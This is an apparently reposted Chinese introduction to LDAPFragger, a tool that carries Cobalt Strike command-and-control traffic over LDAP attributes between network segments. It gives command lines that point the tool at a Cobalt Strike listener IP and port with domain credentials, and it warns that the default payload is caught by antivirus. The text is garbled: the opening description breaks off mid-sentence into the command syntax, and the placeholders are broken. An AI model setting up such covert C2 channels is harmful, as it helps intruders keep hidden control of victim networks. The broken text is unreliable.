关于LDAPFragger

LDAPFragger是一款功能强大的命令控制CCobalt Strike IP> --csport External listener port>   LDAPFragger --cshost Cobalt Strike IP> --csport External listener port> -u username> -p password> -d domain FQDN>

从网段B运行下列命令：

LDAPFragger

 

LDAPFragger -u username> -p password> -d domain FQDN>

我们可以通过“--LDAPS”选项来启用LDAPS，此时常规的LDAP流量仍然会被加密。注意，此时默认的Cobalt Strike Payload可能会被大多数AV捕捉到。

工具运行截图

许可证协议

本项目的开发与发布遵循MIT开源许可证协议。

项目地址

LDAPFragger：【GitHub传送门】

参考资料

https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/

https://docs.microsoft.com/en-us/windows/win32/adschema/r-personal-information

https://github.com/fox-it/LDAPFragger/blob/master/LDAPChannel.ps1

https://www.harmj0y.net/blog/powershell/command-and-control-using-active-directory/

https://www.cobaltstrike.com/help-externalc2

https://support.microsoft.com/en-us/help/314980/how-to-configure-active-directory-and-lds-diagnostic-event-logging

https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/Hunting-for-reconnaissance-activities-using-LDAP-search-filters/ba-p/824726